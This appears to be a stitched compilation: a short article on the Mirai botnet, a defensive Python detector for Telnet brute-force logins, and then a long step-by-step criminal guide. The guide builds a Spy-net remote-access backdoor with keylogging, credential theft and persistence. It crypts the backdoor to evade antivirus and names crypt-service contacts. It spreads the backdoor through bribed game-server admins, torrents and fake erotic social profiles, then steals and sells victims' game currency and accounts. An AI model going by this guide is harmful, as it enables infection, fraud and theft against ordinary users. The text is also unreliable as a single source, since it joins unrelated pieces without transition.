It would be strange if we didn't remember such a famous bot. It is the king of botnets that attack IoT devices, and although it itself has long since died out, its numerous descendants still haunt security professionals. First discovered in 2016, it quickly and efficiently hijacked smart home devices (and sometimes not only them) with weak Telnet passwords.

This botnet was developed by students who for some reason got angry at their own university and wanted to organize DDoS attacks on it. But they missed something, and now this is the largest IoT botnet, if you take into account all its clones.

The botnet grew slowly at first, but after several attacks it was noticed and the hunt for its creators began. They didn't come up with anything smarter than simply publishing the source code. As in: we don't have to be the authors, it could have been anyone, the source code is open. This trick did not help them, and the authors were found. Unfortunately, it was already too late: other groups had received a powerful and dangerous tool for free. The number of botnets based on Mirai (and sometimes complete clones of it) has exceeded one hundred and continues to grow.

In September 2016, after Brian Krebs published an article about DDoS botnet vendors, Krebs himself became the victim of an unusually strong DDoS attack, which peaked at 665 GB/s. This attack in general became one of the most powerful among the known ones. The hosting provider would not tolerate this any longer, and the site was temporarily down until a new host was found.

A month later, a powerful attack was launched against DynDNS. It came in two waves of about an hour and a half each. Despite the rapid response and the measures taken to repel the attack, it still affected users. The consequences were visible until the evening of the same day. It is noteworthy that not one server was attacked, but many around the world. The engineers clearly did not expect such an onslaught and could not react normally. As a result, at least Twitter, GitHub, SoundCloud, Spotify and Heroku were affected.

Ironically, DNS queries were used to attack the DNS provider. Traffic exceeded normal by almost two orders of magnitude, and this is not counting the fact that system administrators urgently introduced filtering. At that time, DNS amplification was already described, but it was not taken seriously. The attack on Dyn corrected the situation, so there are not so many servers vulnerable to this technique anymore.

According to the investigation, only about 100 thousand excessively "smart" devices participated in the attack. Nevertheless, the attack was impressive in its scale.

Inside Mirai is small and clean code, which, however, was not very technologically advanced. Only 31 login and password pairs were used for distribution, but even this was enough to capture more than half a million devices.

Conclusion
Powerful botnets come and go: as soon as cybersecurity researchers and law enforcement agencies close one network (and sometimes its owners), the next one appears on the horizon, often even more threatening. For ordinary mortals, the moral here is very simple: put strong passwords on all your devices and update the firmware, and then your computer, router and overly smart refrigerator will not start working for a criminal gang.
 
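Mirai's only distribution method, as the post says, was a short list of default Telnet credentials, so the defender's signal is a burst of failed logins from one source cycling through several usernames, followed by a success from that same source. The detector below is an added example, not part of the original post and not Mirai code. The syslog-style telnetd lines are constructed (real devices log in many different formats, so the regular expression is an assumption to adapt), and the 60-second window and 5-failure threshold are illustrative defaults, not values from the post.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed syslog-style telnetd message format; adjust the pattern to your devices.
LOG_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2}\s\d{2}:\d{2}:\d{2})\s\S+\stelnetd\[\d+\]:\s"
    r"login\s(?P<result>failed|succeeded)\sfor\suser\s'(?P<user>[^']*)'\sfrom\s"
    r"(?P<src>\d{1,3}(?:\.\d{1,3}){3})$"
)

# Constructed sample: one credential-cycling burst that ends in a successful login,
# one operator typo, and one slow scanner that never crosses the threshold.
SAMPLE_LOG = """\
Jan 10 12:00:01 cam01 telnetd[412]: login failed for user 'root' from 203.0.113.7
Jan 10 12:00:03 cam01 telnetd[412]: login failed for user 'admin' from 203.0.113.7
Jan 10 12:00:04 cam01 telnetd[412]: login failed for user 'support' from 203.0.113.7
Jan 10 12:00:06 cam01 telnetd[412]: login failed for user 'user' from 203.0.113.7
Jan 10 12:00:07 cam01 telnetd[412]: login failed for user 'guest' from 203.0.113.7
Jan 10 12:00:09 cam01 telnetd[412]: login failed for user 'root' from 203.0.113.7
Jan 10 12:00:11 cam01 telnetd[412]: login succeeded for user 'admin' from 203.0.113.7
Jan 10 12:05:30 cam01 telnetd[412]: login failed for user 'admin' from 198.51.100.4
Jan 10 12:05:41 cam01 telnetd[412]: login succeeded for user 'admin' from 198.51.100.4
Jan 10 13:00:00 cam01 telnetd[412]: login failed for user 'root' from 203.0.113.9
Jan 10 13:20:00 cam01 telnetd[412]: login failed for user 'root' from 203.0.113.9
Jan 10 13:40:00 cam01 telnetd[412]: login failed for user 'root' from 203.0.113.9
Jan 10 14:00:00 cam01 telnetd[412]: login failed for user 'root' from 203.0.113.9
Jan 10 14:20:00 cam01 telnetd[412]: login failed for user 'root' from 203.0.113.9
""".splitlines()

def parse_line(line: str):
    """Return (timestamp, result, user, source) or None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # Classic syslog carries no year; deltas are still correct within one day.
    ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S")
    return ts, m["result"], m["user"], m["src"]

def detect_bruteforce(lines, window_s: int = 60, threshold: int = 5) -> dict:
    """Sliding-window failure counter per source. A source is alerted once it has
    `threshold` failures inside `window_s` seconds; a later success from an alerted
    source while failures are still in its window is flagged as a likely compromise."""
    recent = defaultdict(deque)   # src -> deque of (timestamp, user) within the window
    alerts = {}
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        ts, result, user, src = ev
        dq = recent[src]
        while dq and (ts - dq[0][0]).total_seconds() > window_s:
            dq.popleft()          # drop failures that fell out of the window
        if result == "failed":
            dq.append((ts, user))
            if len(dq) >= threshold:
                a = alerts.setdefault(src, {
                    "first_seen": dq[0][0].strftime("%b %d %H:%M:%S"),
                    "failures": 0, "users": set(), "compromised": None,
                })
                a["failures"] = max(a["failures"], len(dq))
                a["users"].update(u for _, u in dq)
        elif src in alerts and dq:
            alerts[src]["compromised"] = user
    for a in alerts.values():
        a["users"] = sorted(a["users"])
    return alerts

if __name__ == "__main__":
    for src, a in detect_bruteforce(SAMPLE_LOG).items():
        print(src, a)
```

The slow scanner at 203.0.113.9 is deliberately below the threshold: five failures in an hour and a half from one source is worth a log line, not a page. The compromise marker is the one to act on, because a success that follows a credential-cycling burst almost always means a default password was still in place.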

Jollier

Professional
AV - antivirus.

Botnet - This is a network of bots. Bots are computers infected by us, whose owners are usually unaware of the infection of their computer. A network is built from these bots, which is controlled by one user, that is, by us. Management takes place through the backdoor admin panel, which can be located both on the hosting and on our computer.

Backdoor - This is our main tool with which we will control other people's computers. The name, translated as "back door", says a lot. First of all it is a virus whose purpose is to be secretly installed on the victim's computer in order to control it.

Cryptography - In our case, this is the encryption of the backdoor code that makes our virus invisible to security programs such as AV, firewalls, etc.
Cryptography can be performed using a special program (cryptor), or manually.

Joiner - This is a program with which we glue our backdoor to any other file. For example, we have glued our backdoor to an image, so when such a file is launched, the image opens and at the same time the backdoor secretly starts.

Stub is an important part of the cryptor code. During encryption, according to a certain algorithm, the encrypted file is written as stub resources and saved.

It turns out that the finished encrypted file is that same stub, which at startup searches its resources for the data we encrypted, decrypts it and executes it. Simply put, the stub acts as a shell to protect against AV.

A signature is a set of bytes by which AV determines whether a file is infected or not. It is the change in signatures that makes the virus invisible to AV.

Backdoor creation
Well, now let's get down to creating our backdoor. For this we need Spy-net 2.7 RAT. Spy-net is a client-server program for hidden remote administration. The backdoor will consist of 2 parts - a client and a server. The server will be located on the computers of the victims, and with the help of our client we will manage the machine of our victim. Open Spy-net. Before us is the client part. Let's create a server with which we will manage the computers of the victims. We press START. If the menu is not in English, then we do this:

botnet1.jpg


To create a server, select "File" -> "Create server" A window appeared where we will create our profile. Each profile can have its own settings. We delete all unnecessary profiles. Click on the "New" button and a window for entering a profile appears. You can name your profile whatever you like, it doesn't matter.

botnet2.jpg


We delete all records in the table. We press the "Add" button and a window appears where we must enter the IP and port.

botnet3.jpg


Let's consider this moment in more detail.

IP

Where to get the IP address.
  • You can purchase a Dedicated Server and use its IP;
  • If you have a static IP you can use your IP;
  • If you have a dynamic IP, you can use the No-ip.com service.

No-ip service

(If you decide to use the Dedicated IP or your own, you can skip this
item). Why do we need the No-ip service? This service is used to turn a dynamic IP into a static one using the service's own software. The software synchronizes our IP with a special domain that we came up with when registering with the service. This domain points to our IP, and when our IP changes, the software synchronizes the new IP with the server. As a result, even when our IP changes, we will always be reachable at one domain. The first thing we need to do is register. Go to the site - noip.com

Click on "Sign up now".

botnet4.jpg


We get to the registration page, fill in the fields as usual, login, password, e-mail (better use foreign services - Gmail, yahoo, etc.) Next, enter the name of our domain, the service has free domains only in the noip.biz zone.

We chose a name for the domain, now click under the column "Free DNS" -> "Sign UP".

botnet5.jpg


We receive a confirmation letter at our email. To activate, follow the link in the letter. That's it, now our account is activated.

Click on the "Download" tab.

botnet6.jpg


Next, click "Download Now". Once it has downloaded, run the installer.

We launch the software. We enter our Email and password that we specified during registration.
The software is authorized. Now click on the "Edit Hosts" button.

botnet7.jpg


Select our domain and save by clicking on the "Save" button. If everything is done correctly, it should look like this:

botnet8.jpg


If yours is different, then you need to try to choose another network card. To do this, click "File" -> "Preferences" Under the line "network adapter" select another network card. If, however, there is a red cross on one of the items, then in the same settings under the "IP Detections Method" line, check the "use alternative IP detection method" item.

Ports

After entering the IP, we need to enter the port. Several are better than one. You can use the standard ports, but for many people the popular ports may be closed by the ISP. There are several methods to find out which ports we have open.

1. Download and run the DoScan program, it is attached to the course. We need the Express Scan tab, it opens immediately at startup. In the "IP address" field, enter our IP.

Next, in the "Start port" and "End port" fields, specify the port search range.
Let's indicate from 1 to 50,000. I think we don't need any more.

botnet9.jpg


Click on the "Scan" button. After scanning, we get a list of used ports.

botnet10.jpg


Now they need to be checked. We go to the site 2ip.ru In the menu, select the "Port check" tab.

botnet11.jpg


In the field, enter one by one all the ports that DoScan issued to us. If it says that the port is closed, you can immediately filter it out. All open ports must be used.

2. Scanning ports using the site tool - hideme.ru Go to the site, select in the menu "All Tools" then "Port Scanner".

botnet12.jpg


Enter your IP in the field, select popular ports and scan. It is also advisable to check them on the 2ip website.

So, now that we have dealt with IP and ports, let's return to our Spy-net. Enter the IP and port into this window.

botnet13.jpg


It is advisable to enter several ports. Next, we have the Identification and Password fields. In the Identification field, enter our ID; you can enter the name of the file to be distributed or your login. This field has no special meaning, it is just for your convenience. In the Password field, enter the password accordingly.

botnet14.jpg


Next, go to the Installation tab. This tab is used to configure the server installation.

botnet15.jpg


The Install server item is autorun: if you uncheck the box, the server will not start automatically on the victim's computer after a reboot. Let's take a look at the settings of this tab.

"Installation directory" - defines where our server will be installed locally.

System - folder "C:\WINDOWS\System32\"

Windows - folder "C:\WINDOWS\"

Root - the root of the boot disk

Program Files - folder "C:\Program Files\"

Other - specify the path manually.

On the right we see the fields "directory" and "File Name"

Directory is the folder where our server will be installed

File name - the name of the file that our server will assign to itself

"Inject into" - this function injects a server process into another process and works on behalf of this process.

No inject - The process takes place without injection.

Default Browser - Injects into the default browser process.

Other - We manually indicate the process in which you want to be introduced.

There are additional options below.

Persistence - this function allows the server to automatically recover when it is detected. For example, if they find and delete a server file, server process, server startup keys, they will be automatically restored.

Hide File - Hides the server file

Change creation date - changes the server creation date

Melt file - self-deletion of the executable file

Mutex - with this function, it excludes the possibility of starting the 2nd copy of the server.

"Boot" - the registry keys through which our server can be started are specified here.

We're done with this tab. Let's go further.

Message Tab

botnet16.jpg


This function is intended to display an error window when the victim starts the server.
Here you can select the error icon, title and text. In our case this function is useless to us. It is only useful when running a bare server. Move on.

Keylogger Tab

botnet17.jpg


This function allows you to record every keystroke on the victim's keyboard. I think that the keylogger is familiar to many.

Under the line "Keylogger settings" we see 2 items:

"Delete [BACKSPACE]" - when this option is selected, the keylogger will also record presses of the backspace key.

"Send logs by FTP" - this function allows you to send logs to your FTP server. Below are the individual settings:

Send to - FTP server name

Directory - server folder to which logs will be sent

FTP user - ftp server login

FTP password - password from ftp server

Send logs FTP port - port for sending logs

Send each - the period of time after which the logs will be sent.

Of course, it is more convenient that the logs come to FTP. And we move on.

Anti-debug tab

botnet18.jpg


This function protects against starting our server on virtual machines and debug systems. Our server will not start on systems with a check mark.
Naturally, we tick all the boxes, because virtual machines are of no use to us)

Create server tab

botnet19.jpg


So the climax. The final stage. Let's take a closer look at the functions of this tab.
(I recommend setting the settings as in the screenshot).

"Use icon" - applies the selected icon to the server. Put a tick and an icon appears on the left. If you click on it, you can select an icon from the list.

We will not need this function, because we will still glue our server with another file.

"Compress with UPX" - after creating the server, it is compressed by the file packer - UPX
"USB Spreader" - Distribution via USB stick. If the victim inserts a flash drive, the server will automatically write its copy to it in stealth mode.
"p2p Spreader" - Spreads through p2p networks like DC++
"RootKit" - masking the server and its process in memory.
"Google Chrome Password" - steals passwords from the Google Chrome browser.
"Bind files" - Joiner. With it, we can glue our server to any other file.

Click "Bind files" and glue them with the file we need.

botnet20.jpg


A window for gluing appears, in the "File" field we select the file we need.

Click on the "Add" button, the file appears in the list, put a check mark.

Leave all other parameters unchanged.

Click on "Create server" And create our server.

If everything went well, a window will appear that asks us "Do we want to save the current settings", you can save the settings.

Now, to make sure that we did everything correctly and everything works for us, it is advisable to check our server on yourself.

It is best to create a server that we will run on a virtual machine, for this, when creating a server in the "Anti-debug" tab, we uncheck all the boxes, or run it on our machine and when creating a server in the "Installation" tab, uncheck the "Install server ", so our server will be deleted after reboot.

Further, it is VERY IMPORTANT, in the client itself, select "options" -> "select listening ports".

botnet21.jpg


A window opens where we register all the ports that we specified when creating the server.

We also enter the password that we specified when creating the profile, save it. Now we are starting our server, an ominous laugh is heard (I advise you to turn it off, because when a new bot suddenly connects, many will be frightened of surprise) and we appear in the client line.

By right-clicking on our bot, we see a list of control functions. The list is quite large and varied, so we will analyze the management in the separate manual that is attached, and we go further.

Backdoor encryption
We have a backdoor, but this is not enough. So far there is no use in it, because not a single antivirus program or firewall will let it through. It is not worth hoping that the victim has all protection completely disabled. What do we do?

In order for our backdoor to be invisible to security programs, we need to hide it from them, that is, crypt it.

How it's done?

There are 2 ways:
  • Manual;
  • Program.
We will not plunge into the jungle of manual cryptography, because at first we do not really need it and it will take a lot of time, and as you know, time is money.
We will consider the programmatic method of encryption.

Cryptors

There are public and private cryptors. We will look at public cryptors.
A cryptor is a program that automatically encrypts the file we have selected.
Perhaps the most important part of each cryptor is the stub (you can read what a stub is on the first page).

The beauty of public cryptors is that they are free.

But the fact is that the stub consists of signatures, and it is by the signatures that AV determines whether a file is infected.

The more time the cryptor is in the public domain, the more people will use its stub and thus the signatures will get into the databases faster. Simply put, viruses encrypted with a public cryptor do not live very long, but they will do well for a few days.

But you can still extend the life of public cryptors, or rather their stubs, by cleaning signatures. True, here we need the skills of manual cryptography. If someone wants to learn, you can search for information on the Internet, since there is a lot of it, both manuals and video lessons. If we started to touch on the methods of manual encryption and study them, many beginners would simply have their brains overflow with information: this is pure programming, and further reading of the course would become simply difficult, given how much information lies ahead.

Plus, manual encryption is a very lengthy process, because signatures are calculated by the brute force method, and each of your selections must be checked for falsity.

If you use a cryptor and most AVs still detect your backdoor, then instead of manual encryption you can use the method of combining stubs. That is, we crypt the file and then crypt it again with another cryptor or stub. You can combine as much as you want; the main thing is to check for detection every time and look at the changes. If no changes are observed, then crypt in the reverse order or use other cryptors.

How can we test our encrypted backdoor for detection?

One AV will not be enough, because that is not an indicator. "Tastes differ ..." Well, you get the idea, and that's why everyone uses different AVs. Do not install all AVs in turn and check! There are special services for this:
  • virusscan.jotti.org (22 AV, free)
  • chk4me.com (25 AV, free)
  • file2scan.net (35 AV, 10 $ per month)
  • elementscanner.com (35 AV, shareware)
  • fullscanner.net (35 AV, 9 $)
P.S.: NEVER use VirusTotal (www.virustotal.com) for checks, even if this is not the final version of the virus or you will not use it: the signatures will get into the AV databases, and any file encrypted with such a cryptor will be detected the next day.

Bare backdoor, not crypted

botnet22.jpg


Glued and encrypted backdoor using public cryptors by combining.

botnet23.jpg


Where can we get public cryptors?

One of the best options, in my opinion, is the Spanish forum - indetectables.net/viewforum.php?f=7

In the section - "Nuevos Troyanos y Herramientas" fresh cryptors are posted every day.

But the only disadvantage for newbies will be the "antiinub" system. (It is also a plus, because although the cryptors are public, not all of them will be able to use them)
Some passwords to the archives are encrypted and this site will help to decrypt them - crypo.in.ua/tools/. There are also special programs.

Hints are attached to such encrypted passwords - abbreviations of cryptographic algorithms and languages, or software with which the password is decrypted.

Also, most likely not all public cryptors will start for you, because some of them are written using libraries that not every user has. This will be indicated by an error message of the form "COMCTL32.OCX library not found". But this is not a problem, because you just need to download the file of the required library and register it via cmd. How to do this, you can read in more detail on the Internet, because the settings for different versions of windows and bit systems are different. You can find out which library you need from the error message.

botnet24.jpg

In the future, I advise you to purchase a private cryptor, because it saves a great deal of our time, nerves and money. Of course, you can also master manual encryption, which will be much cheaper than purchasing a cryptor, but one manual encryption can take you more than an hour. How much could you get done in that time? I think a lot, whereas the cryptor will do it in 1 second and with a clean result.

Their cost varies from $15 to infinity. Decent cryptors cost from $150. A big plus of such cryptors is that they are updated almost every day.

Crypt services

If you are too lazy to mess with cryptors and you have a small budget, then the easiest option for you is to use a crypt service. Usually, all crypt services crypt to 0, that is, so that no AV detects the threat. There are many such services, but not all of them provide high-quality services (and some do not provide them at all, but simply disappear with your money).

Verified crypt services:

1. Icq: 309994 - $10-15 per file. One of the cheapest crypt services, with a controversial reputation. Personally, I did not have any problems; if something was wrong, I got my money back.
2. Jabber: [email protected] - $ 20 per file. For the price-quality best service.
3. Jabber: [email protected] - price depends on the file. I worked with him for a long time, everything was always at its best, but lately he rarely happens to be on the net.
4. Jabber: [email protected] - $ 40 per file. I worked with him before, everything was fine. Now the price is quite high.

Before crypting, tell the seller what the backdoor is based on and what it is glued to. After crypting, also check whether the file is detected, and whether it starts at all. Otherwise, demand a re-crypt or a refund.

Algorithm of actions

1. Create our backdoor and glue it with the file under which we will distribute, preferably with an .exe file.
2. We crypt the resulting glued backdoor.
3. Checking the backdoor on AV databases
4. Distributing
5. Profit
6. Do not forget to update the backdoor at least once a week.

As a result, we get an .exe file that is not detected by most AVs and launches our backdoor in stealth mode.

Important Tips

1. It is the already glued backdoor together with the executable file (software / game) that should be crypted. If you do it the other way around, there is a chance that the backdoor will be detected because of the gluing.

2. After gluing and crypting, test-launch the file on yourself. It happens that gluing or crypting damages the file, and it stops running. In such cases, it should be re-crypted or glued with another joiner.

3. The backdoor should be updated at least once a week, ideally once a day (if you want good results, update every 1-2 days)! An update is a re-crypted backdoor. After a while, the backdoor starts to be detected by AV, and whenever this happens our bots need to have the backdoor updated.

It is very easy to update. We create a new server (backdoor) with the same parameters as the one we distributed, or we take the bare server file (without gluing) that we already distributed and re-crypt it.

Next, select all bots in the Spy-net client and choose the item "Send file and -> Run hidden".

[screenshot: botnet25.jpg]

Legalization
Perhaps this concept is incompatible with a botnet, but I will try to convince you.
The point is to force the user to voluntarily install our backdoor, and this is done using an agreement with which he agrees.

Looking a little ahead, I will say that one of the distribution methods will be through installation files. Almost every installer has a license agreement.
It is these license agreements that we will need to edit.

The change will concern notifying the user that third-party software will be installed on his computer, the installation of which he must consent to. Who reads our license agreements? That's right, no one and naturally he will give his consent.

Now everything is in order.

We have an installation file with which we will glue our backdoor. Before gluing it to the backdoor, we need to edit the license agreement. This can be done manually, and if we distribute the file through the owner of the installation file, then it is better to ask him directly.

What exactly to edit and where depends on the clauses of the license agreement.
It is advisable to implement our addition somewhere in the middle of the agreement, so that it would not be very conspicuous. The text must be designed in an official business style, must comply with the clause in the agreement and notify the user that he agrees to install our backdoor.

Examples:

The user is hereby notified and agrees that when using the "program", if necessary, a third party will administer the user's PC remotely to perform the necessary tasks.

By using the "program" you agree that additional software will be installed on your computer, which will allow a third party to remotely administer your computer.

This text is usually used under the clauses "General provisions" or "Terms of use".

The text is given as an example, composing your own is not difficult.

The main thing is to indicate that the user agrees / is notified / is informed that actions will be performed on his computer using third-party software by a
third party, although you can probably indicate the "copyright holder" instead, because no one will then figure out who is the copyright holder and who is the third party.

It all depends on what product you need to edit the agreement and what functions you will use.

You can write more vaguely, but I do not advise.

Now let's see how we can create our own installation file with a license agreement.
For this we need a well-known compiler - Smart Install Maker. Let's say we need to create our own installation file for some software.

[screenshot: botnet26.jpg]

We open our compiler. The first thing we see in the "Information" menu is where we fill in the fields according to the software itself and choose the path to save the installation file itself. Next, we need the "Files" menu, find a shortcut with the name "Add files from folder" in the lower right menu, find the folder with our software and select it. All files from the folder will be automatically transferred to the compiler.

[screenshot: botnet27.jpg]

Next, go to the "Dialogues" menu. In the general tab, in principle, you can leave everything as it is. We are interested in the "License / Information" tab. We put a tick in the box "Show the license agreement" and select the path to the file with the agreement (if you do not have a license agreement yet, you can download it or copy it into a text file and edit it).

[screenshot: botnet28.jpg]

In the "Interface" menu, select and customize the design for our installer.
The rest of the menus are not necessary for us to create a regular installation file.
In the top menu we find a shortcut with the name "Compile", click and our installer is ready.

The program is very clear and easy to use; with its help you can make your own repacks (RePack, i.e. pirated releases) of games and installation files for various programs
(I advise you to study this compiler in more detail for creating repacks).

Distribution
How you distribute your backdoor will determine how efficiently your botnet grows.

There are a lot of backdoor distribution options, we will consider several of them.

1. Distribution through game launchers.

Of course, we can glue our backdoor with the game and scatter it across forums and other platforms, but believe me, this will not bring the expected result, and at the same time you will waste a lot of time.

Why push downloads on users when the user himself can find our file and download it?

I'm talking about distributing pirated game servers or programs through websites.
At the moment, there are a large number of multiplayer games on the network, and there are even more pirate servers for these games. And most of the administrators of such servers are schoolchildren, which should play into our hands.

I recommend that you start your search with games like - Minecraft, CS, Lineage 2, WoW, Aion. Almost every pirate server of these games has its own launcher, there are a lot of servers for these games and they are growing every day.

Where to begin

The first thing we need to do is select the game servers with which we will glue our backdoor. It is advisable to approach the choice with some criteria:
  • the server has its own launcher;
  • good server popularity;
  • a young administrator.
The bottom line will be to agree with the server admin about gluing our backdoor with the launcher of their game.

Take the game Minecraft, for example. We find the site of a server for this game and write to the administrator that we have a business proposal for him. It's better not to write what we need right away, let him answer better. If he doesn't answer, then he is not interested in money)

As a result, we have to offer the admin a reward (usually $10-20) to let us glue our backdoor to the launcher. Naturally, it is better to say that this is,
for example, a script for cheating at something; he will not see or recognize what we are gluing the launcher with anyway. If there is a license agreement in the launcher, then ask him to edit it so that everything is consistent between the players, you and the admin. We give him our text with the edits to the agreement; as a rule, editing it will not be difficult for him.

Admins vary: some will refuse, some will ask for more money, some will think for a long time, but if the administrator is a student and it comes to money, then they usually agree and are not even interested in what your "script" is.

You can agree on payment in a month; there have been such cases. In any case, within a month you will have already assembled a good network, which will pay for the monthly payments that keep your network growing.

Personally, I had very good performance from Minecraft servers. There were from 10 to 200 downloads from one server per day. And there were several such servers.

Another important point is that our backdoor must be clean for all popular antivirus programs such as Kaspersky, NOD, Avast, Dr.Web, Norton, McAfee, Panda, AVG, Avira, Emsisoft, etc. Ideally, it should be 100% clean, because a few complaints from users that there is a virus can alert the admin and other players, and we do not need that kind of exposure.

It is also necessary to re-encrypt our backdoor once a week and glue it to the launcher, otherwise the backdoor will soon start firing the security programs.
Discuss this moment with the administrator.

Spreading the backdoor through games is effective and cost-effective in terms of the fact that the computers of gamers are powerful enough, which is important, for example, in such a direction as bitcoin mining.

2. Distribution through game bot programs

As well as pirate servers, there are a lot of different bots for these games.
Why bots? It's simple: here our prey will be the accounts from the official game servers, which we will talk about a little later. For those unfamiliar with multiplayer games, a bot is a program that performs actions in the game in automatic mode, that is, without the participation of the player. For example, collecting valuable things, leveling a character, trading at an auction, etc. Simply put, bots are used to automatically earn game currency, and as you know, this currency has value only on official servers. That is why most people use bots on official servers.

I recommend using bots for games like WoW, Aion, Lineage 2, Guild Wars 2, Diablo III.

We will look for the creators of these bots or resource administrators who distribute public / hacked versions of these bots.

Finding these resources is not difficult; you just need to enter in a search engine, for example, "WoW bot".

The communication scheme is the same as in the first version.

The contact is mainly made by resource administrators who distribute these bots in free access, because the income from their resources is not great, but here at least some kind of reward. But the bot developer has money from his sales, so they are often not interested in such offers, but still I managed to negotiate with some of them.

One of the advantages of this distribution option is that when using and downloading bots, many disable all security programs because almost all of them
regard bots as malware. But this does not mean that it is not necessary to encrypt our backdoor!

3. Distribution via torrent trackers

Yes, surely many of you know about this method or have thought of it yourself.
But it will not be superfluous to mention this method.

The backdoor will be distributed again through games.

The first thing we need to do is to monitor the game market and identify the next game releases.

Take the famous GTA V.

There are 2 options for development:

1. We create our own repack, glue it with a backdoor and put it on torrents on the day of release. To do this, we need to have a key and a game license, that is, pre-order it. We will not waste time telling you how to make your own repack; for this you can use Smart Install Maker, and besides, the Internet is full of guides and video tutorials.

2. Download a ready-made repack and distribute it with our backdoor on trackers. Of course it's easier: you don't need to buy the game, you don't need to waste time creating a repack. But you will waste time downloading the repack, which plays a big role during the release. It happens that the distribution hangs for a couple of hours and then is removed at the request of the copyright holders, but not from all trackers. Here it is a matter of luck. It is also important to update our distribution once a week, that is, to glue the repack with the newly crypted backdoor. Otherwise, after 1-2 weeks our repack with the backdoor will slowly begin to be detected by security programs, users will start yelling in chats and your distribution will be shut down.

4. Distribution through questionnaires

The method is as old as my great-grandmother.

I want to warn you right away that by this method we will receive low-quality bots, but they will do quite well for buildup.

The bottom line is to attract lustful users (and there are many of them) to our profile pages and force them to download the file with our backdoor.

We go to Facebook or any other social network.

We register girls' profiles. We post seductive photos, possibly in underwear, but without nudity. We make a more or less realistic profile; no need to post photos of top models, famous personalities or porn actresses.

We start promoting the pages. We send photos of the girls from our profiles to popular dating groups, and write under the photos something like "get to know a boy", "boys add", etc. That is, we need to interest the men so that they go to our page. You can send messages using special programs.

Next, we need to force the download of our backdoor file.

We will distribute under the guise of an archive with erotic photographs of the girl from our profile. The archive can be filled with random erotic photos, but that will be suspicious, so we put a password on the archive and give everyone the wrong password. You can also use erotic photos of the girl from our profile, but it is very difficult to find ordinary photos of a pretty girl and then her erotic photos. But it is possible, and this can help us - pornolab.net/forum/viewforum.php?f=1728

In general, we create an archive with a photo and glue it to our backdoor.

Further, under the photos in the questionnaire, we place a link to our archive, or in the status we write something like “New pictures from my erotic photoset in my links” and place our link to the archive in the “links” section.

Let's pay attention to the link. If you upload our archive to any well-known file hosting service, then VK itself will block all such links. Therefore,
it is advisable to do a clean redirect.

For this we go to nic.reg3.ru, (or to any other site selling domains).

We register, buy the cheapest domain zones. After that, our domain appears in our list. Click on it and we go to the domain management menu. We find the line "setting the zone and redirection" under it we see a small menu, where we put a dot in the item "Redirect to the site" and enter our link where we will redirect from this domain, for example zalil.ru/123456

[screenshot: botnet29.jpg]

As a result, we get an inconspicuous link that redirects the user to the file hosting service to download our archive.

For example, in the links we have "myphotosession.rf" clicking on it the user goes to the file sharing site "zalil.ru" where he can download our archive.

Monetization
Now we have a versatile and very effective tool for making money online. Consider some types of botnet monetization.

Sale of game currency and accounts

Many game accounts on official servers are of some value,
namely:
  • The character itself. The value depends on the level of the character;
  • Game currency.
Sale of game currency.

The method is quite routine and not very stable, but I started with it. With 10-20 downloads per day of my backdoor, I received from 1k rubles to 10k rubles per day. It depends more on how lucky you are with your account.

Probably one of the most important points is to determine the game in which we will specialize. Of course, you can avoid focusing on one game and take everything that falls into our "pocket", but this is very inconvenient.

To simplify the search for the accounts we need and expand the circle of our "clients", we choose the distribution method through bots. Naturally, we will use a bot for the game we chose.

Using this method, we will sell in-game currency.

To begin with, I recommend to monitor the market and see the currency of which game is the most expensive. Quite an expensive exchange rate for the currency of games such as Rift and Guild Wars 2, but personally, I recommend working all the same on WoW, because the population of this game is very large, and, accordingly, the demand for currency.

The bottom line will be to go to the victim's account and redirect the game funds either to your account, or to the service account to which we are selling currency.

Consider both options:

1. We sell currency to large currency-selling services; they constantly need suppliers. First of all, we need to monitor these services and see who buys the currency at a higher price than the others. Their buy prices are lower than their sell prices and differ between services by a few rubles, or maybe even kopecks; in large transactions, even a couple of kopecks will bring a significant increase.

2. Sell the currency directly to the buyer. Instead of selling currency to huckster services at 2 or even 3 times cheaper, you can sell it immediately to players. This method requires more time, but we will earn at least 2 times more.

To do this, it is desirable for us to have several characters on each of the servers of this game. These characters will serve as a piggy bank for our currency.
Or, you can simply record the victim's account, the amount of money on the account and the server. Thus, transfer money to the player immediately from the victim's account, but the disadvantage here is that when the victim is playing, we will not be able to enter, and therefore, we will not be able to transfer the game currency at any time.

The very transfer of this currency within the game also plays a big role.

Some of the most common methods are through auction, guild, or trade.

Here are some examples:

Auction. We go to the account of our victim and look at the amount of money on the account, remember. Next, we go to our piggy bank character, go to the auction and place some small change, the cost, which will be equal to the amount that is on the account of our victim. Everything, posted. Again we go to the account of our victim, go to the auction and buy the thing that was placed with the help of the piggy bank character. Now all the money has flowed to our character.

Guild. We go to the victim's account and leave the guild, unless of course he is a member of the guild. Next, from our piggy bank character, we create a guild and invite the victim's character there . Again we go to the victim's account, join the guild and replenish its account with all the means of the victim.

The most important! So that the victim does not suspect too much, remember where the character stood when entering the game and when exiting, try to return him to the same place. The advantages of this method are that the victim does not understand where his money went and blames it on a game bug, which minimizes the risk of suspicion of “malware”. In the end, this is a game and the loss of game money is much less upsetting than the loss of a game account ;)

Stealing game accounts.

This method is a little easier to implement and does not take a lot of time.
To begin with, we also need to choose a game on which we will work.
I recommend choosing the most famous and most populous games such as WoW, Aion, Lineage 2, WoT.

You already know how to distribute the backdoor. Next, we begin to collect the fruits.
Install the game client and view the accounts of our victims. It is advisable to install the client on a dedicated server or virtual machine using a proxy or VPN.

We are interested in accounts whose levels have reached more than half of the maximum level (for example, the maximum level is 80, which means we select accounts whose levels are more than 40). The higher the level, the more expensive the account.

It is desirable to sell at a lower price, because it is important for us to sell as quickly as possible.

For sales, you can use special intermediary services, but they have a number of disadvantages; for example, some ask you to confirm passport data. Confirming with fake data is not a problem, but it is an extra hassle.

But there are also services that post your ads without any checks.
You can also sell in the most usual way, spreading an advertisement for the sale of a character on social networks, on game forums, message boards, in any case, the buyer will find you, it's a matter of time. The more ads, the faster you can sell.

There are several pitfalls here:

1. Before selling an account, you need to change the password of the victim's account and of the mailbox, and set it aside for a week. If during this period the victim has not restored access, then most likely he cannot do so, or he simply does not care about the account. We can sell such accounts with minimal risk that the victim will regain access.

